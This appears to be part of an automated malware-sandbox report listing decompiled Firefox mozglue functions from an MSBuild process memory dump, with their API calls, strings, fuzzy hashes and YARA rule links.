Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 9871a8751e4678db14a599114f28f792d2ba9b0706eac1bfb07eab493c3de46a
Instruction ID: 4eaf2373b693fe42afe2c5e882d82bb64af3dd5a2f076a64895a1e0bc77859ad
Opcode Fuzzy Hash: 9871a8751e4678db14a599114f28f792d2ba9b0706eac1bfb07eab493c3de46a
Instruction Fuzzy Hash: 5B316CB1A047058FDB00FF78CA4DA6EBBF1BF85305F024A2DE89586711EB709449CB96

Function 6C4A9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C4A9675
__Init_thread_footer.LIBCMT ref: 6C4A9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C4A96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C4A9707
__Init_thread_footer.LIBCMT ref: 6C4A971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4A9773

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C4A97B7
FreeLibrary.KERNEL32 ref: 6C4A97D0
FreeLibrary.KERNEL32 ref: 6C4A97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4A9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C4A9670
MapViewOfFileNuma2, xrefs: 6C4A97B1
ntdll.dll, xrefs: 6C4A96E3
NtMapViewOfSection, xrefs: 6C4A9701

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 0ec8cb1afc470fd09253927a8a020a90c84bb58fdc0a39403c20a220bf57005c
Instruction ID: de5d83762c83c37dfa994e0d073dee364b970a14f5ad9a22411de296463ea47e
Opcode Fuzzy Hash: 0ec8cb1afc470fd09253927a8a020a90c84bb58fdc0a39403c20a220bf57005c
Instruction Fuzzy Hash: C741E3B4B04201DBEF00CFA4DC8DE9677B4EB59315F024229ED0687F40E731A805CBA5

Function 6C4E0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4E0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4E0041
GetCurrentThreadId.KERNEL32 ref: 6C4E0075
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4E0082
moz_xmalloc.MOZGLUE(00000048), ref: 6C4E0090
free.MOZGLUE(?), ref: 6C4E0104
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4E011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C4E005B

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 5eda20fc17a41ba51589ca1c14c87346c5a321b7bdff33c8e39c2e6e7cdeb5ec
Instruction ID: ce1ae4fc74aa808b4addefde0ef151f306593f344f089269b2915c16afdacf5b
Opcode Fuzzy Hash: 5eda20fc17a41ba51589ca1c14c87346c5a321b7bdff33c8e39c2e6e7cdeb5ec
Instruction Fuzzy Hash: 8541DEB56002049FCB10DF65C845E9ABBF0FF49318F02461DE95A87F50DB32B805CBA6

Function 6C4A7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4A7EA7
malloc.MOZGLUE(00000001), ref: 6C4A7EB3

Part of subcall function 6C4ACAB0: EnterCriticalSection.KERNEL32(?), ref: 6C4ACB49
Part of subcall function 6C4ACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C4ACBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4A7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C4A7F19
malloc.MOZGLUE(?), ref: 6C4A7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4A7F4D

Strings

d, xrefs: 6C4A7F89

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 7fac9997d9685369367498dbeeb940ddbab0f4e27c151efa3b62b66065b723f5
Instruction ID: 121e2e23b639d530c95a62ce63bbd7786b3c186207696448b438e985e2a5456b
Opcode Fuzzy Hash: 7fac9997d9685369367498dbeeb940ddbab0f4e27c151efa3b62b66065b723f5
Instruction Fuzzy Hash: E031E961E043499BDB01DB68CC05EFEB778EF96208F05522DEC4597612FB31A685C395

Function 6C4A3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C4A3CCC), ref: 6C4A3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4A3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C4A3CCC), ref: 6C4A4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4A40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C4A3CCC), ref: 6C4A40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C4A3CCC), ref: 6C4A40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C4A4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C4A3CCC), ref: 6C4A4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C4A3CCC), ref: 6C4A4157

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 3088bc9c87df58123783d4045985366564c4ef675f0e3f908adf6070c3221b06
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 82A17DB1A00205CFDB40CFA9C880F5AB7B5BF58348F255199D909AF746D771E887CBA0

Function 6C492030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C4B3F47,?,?,?,6C4B3F47,6C4B1A70,?), ref: 6C49207F
memset.VCRUNTIME140(?,000000E5,6C4B3F47,?,6C4B3F47,6C4B1A70,?), ref: 6C4920DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C4B3F47,6C4B1A70,?), ref: 6C49211A
EnterCriticalSection.KERNEL32(6C51E744,?,6C4B3F47,6C4B1A70,?), ref: 6C492145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C4B3F47,6C4B1A70,?), ref: 6C4921BA
EnterCriticalSection.KERNEL32(6C51E744,?,6C4B3F47,6C4B1A70,?), ref: 6C4921E0
LeaveCriticalSection.KERNEL32(6C51E744,?,6C4B3F47,6C4B1A70,?), ref: 6C492232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C492253, 6C492268
MOZ_CRASH(), xrefs: 6C49227D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: bed403a04751f7b71c96b30fc36c77e9328ae2f73988ab12cac477122ded0d18
Instruction ID: 949a5d6770a4ce99fc5362831bc839cc8204da89fec87897b23a0053367e11b8
Opcode Fuzzy Hash: bed403a04751f7b71c96b30fc36c77e9328ae2f73988ab12cac477122ded0d18
Instruction Fuzzy Hash: C361A431F002268FDB14CB68CD8EF6E7BB5AF85319F154229E524A7F95DB709900C781

Function 6C4E9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4E8273), ref: 6C4E9D65
free.MOZGLUE(6C4E8273,?), ref: 6C4E9D7C
free.MOZGLUE(?,?), ref: 6C4E9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C4E9E0F
free.MOZGLUE(6C4E946B,?,?), ref: 6C4E9E24
free.MOZGLUE(?,?,?), ref: 6C4E9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C4E9EC8
free.MOZGLUE(6C4E946B,?,?,?), ref: 6C4E9EDF
free.MOZGLUE(?,?,?,?), ref: 6C4E9EF5

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 40526b83dba155cb28e0566ccdf6e3e056852ee23caa0d4c302668601c0a1cba
Instruction ID: 421e9dfd65975f7bed8486183d5cf46036b6ca1849c672ef32c51ceaae2ecce6
Opcode Fuzzy Hash: 40526b83dba155cb28e0566ccdf6e3e056852ee23caa0d4c302668601c0a1cba
Instruction Fuzzy Hash: 05719B70909B419BC712CF18C440D9AF3F4FFA9316B45861DE84A5BB41EB31E885CBD1

Function 6C4EDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C4EDDCF

Part of subcall function 6C4CFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4CFA4B

Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E90FF
Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4EDE0D
free.MOZGLUE(00000000), ref: 6C4EDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4EDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4EDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4EDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C4DDEFD,?,6C4A4A68), ref: 6C4EDF32

Part of subcall function 6C4EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C4EDB86
Part of subcall function 6C4EDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C4EDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C4DDEFD,?,6C4A4A68), ref: 6C4EDF65
free.MOZGLUE(?), ref: 6C4EDF80

Part of subcall function 6C4B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4B5EDB
Part of subcall function 6C4B5E90: memset.VCRUNTIME140(ewOl,000000E5,?), ref: 6C4B5F27
Part of subcall function 6C4B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4B5FB2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 15dc62059e020fa448f109a8a75b5974590f7a93523ba2ed7fdea820efc483a6
Instruction ID: 4347b447479dc054b08442559574b9de4b8ab237af9fbc82d7f236530d6d6755
Opcode Fuzzy Hash: 15dc62059e020fa448f109a8a75b5974590f7a93523ba2ed7fdea820efc483a6
Instruction Fuzzy Hash: 68519372601A019BD711DB28C884EAEB376AFD935AF97052CD81A53B00D731F919CBD2

Function 6C4F5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5DC9
std::_Facet_Register.LIBCPMT ref: 6C4F5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C4F5C8C,?,6C4CE829), ref: 6C4F5E45

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: fa0ac9fe360ef91715a8c544a62d967eb4a6570b9beef075ebca3bc0af6d3ca7
Instruction ID: 60d28922a3b0a46810c3c7ee3ae3571db386b5004a3d2fb12148c9c84fb49120
Opcode Fuzzy Hash: fa0ac9fe360ef91715a8c544a62d967eb4a6570b9beef075ebca3bc0af6d3ca7
Instruction Fuzzy Hash: 9B41B0747002048FCB04EF64CC9DEAE77B6EF89315F058068D51A9B791EB34E806CBA1

Function 6C4CCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C4931A7), ref: 6C4CCDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C4CCFA4, 6C4CCFB8
<jemalloc>, xrefs: 6C4CCF9F, 6C4CCFB3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 435430ccafb0366233334b74bb05fd023abfa4540483c7dfa7456d92b09f491f
Instruction ID: fd5fbae16cbb27f96946c4a4e0d6366643e3139156d984fcc673c8ee3b6c301a
Opcode Fuzzy Hash: 435430ccafb0366233334b74bb05fd023abfa4540483c7dfa7456d92b09f491f
Instruction Fuzzy Hash: 1A31B0747442055BFF00EFA98C4AFAE7AB5AB46719F214119E610ABFD0DBB0D400CBA6

Function 6C49ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C49F100: LoadLibraryW.KERNEL32(shell32,?,6C50D020), ref: 6C49F122
Part of subcall function 6C49F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C49F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C49ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C49EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C49EDCC
CreateFileW.KERNEL32 ref: 6C49EE08
free.MOZGLUE(00000000), ref: 6C49EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C49EE32

Part of subcall function 6C49EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C49EBB5
Part of subcall function 6C49EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C4CD7F3), ref: 6C49EBC3
Part of subcall function 6C49EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C4CD7F3), ref: 6C49EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C49EDC1

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: a0cf81f22686eb99e60f90df40f3c468a77368a36f690e813df205daa7530988
Instruction ID: 0aa65402ad270b958f4b27c8a2c83a8ba81a8eb88b9e40e866cf9994c51fc540
Opcode Fuzzy Hash: a0cf81f22686eb99e60f90df40f3c468a77368a36f690e813df205daa7530988
Instruction Fuzzy Hash: 2B51C171D052248BDB01DF68C884FEEBBB0BF59318F44851DE85567B90E7316949C7E2

Function 6C50A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C50A565

Part of subcall function 6C50A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C50A4BE
Part of subcall function 6C50A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C50A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C50A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C50A6B6

Strings

z, xrefs: 6C50A6AE
0, xrefs: 6C50A5FB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 2bf07a2753c0d0942e53ca4ca0f43e1c900cdc15d14b7e6136b5209c40f79c4e
Instruction ID: 9b0dc1f9d2cacc966060598aefb456b0d60c50957cdf8733a1b633251c9c2b74
Opcode Fuzzy Hash: 2bf07a2753c0d0942e53ca4ca0f43e1c900cdc15d14b7e6136b5209c40f79c4e
Instruction Fuzzy Hash: EB410571A097459FC341DF28C480A9BBBF5BF89354F409A2EE49987650EB30E649CB92

Function 6C4978C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C51008B), ref: 6C497B89
free.MOZGLUE(?,6C51008B), ref: 6C497BAC

Part of subcall function 6C4978C0: free.MOZGLUE(?,6C51008B), ref: 6C497BCF

free.MOZGLUE(?,6C51008B), ref: 6C497BF2

Part of subcall function 6C4B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4B5EDB
Part of subcall function 6C4B5E90: memset.VCRUNTIME140(ewOl,000000E5,?), ref: 6C4B5F27
Part of subcall function 6C4B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4B5FB2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: f86d555cd68ffce0ac62e64575fddb863fbfc127ffc1acb1f19b535b028c3ce3
Instruction ID: 2b3dd79895d2cf4b5061e2f528c2b3d013278d3f4abc277f04450bef41466626
Opcode Fuzzy Hash: f86d555cd68ffce0ac62e64575fddb863fbfc127ffc1acb1f19b535b028c3ce3
Instruction Fuzzy Hash: 49C1A231E091388BEB24CB28CC90F9DBB72BF41318F1543A9D51AA7BD1D7319E858B91

Function 6C4D9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
__Init_thread_footer.LIBCMT ref: 6C4D949F

Strings

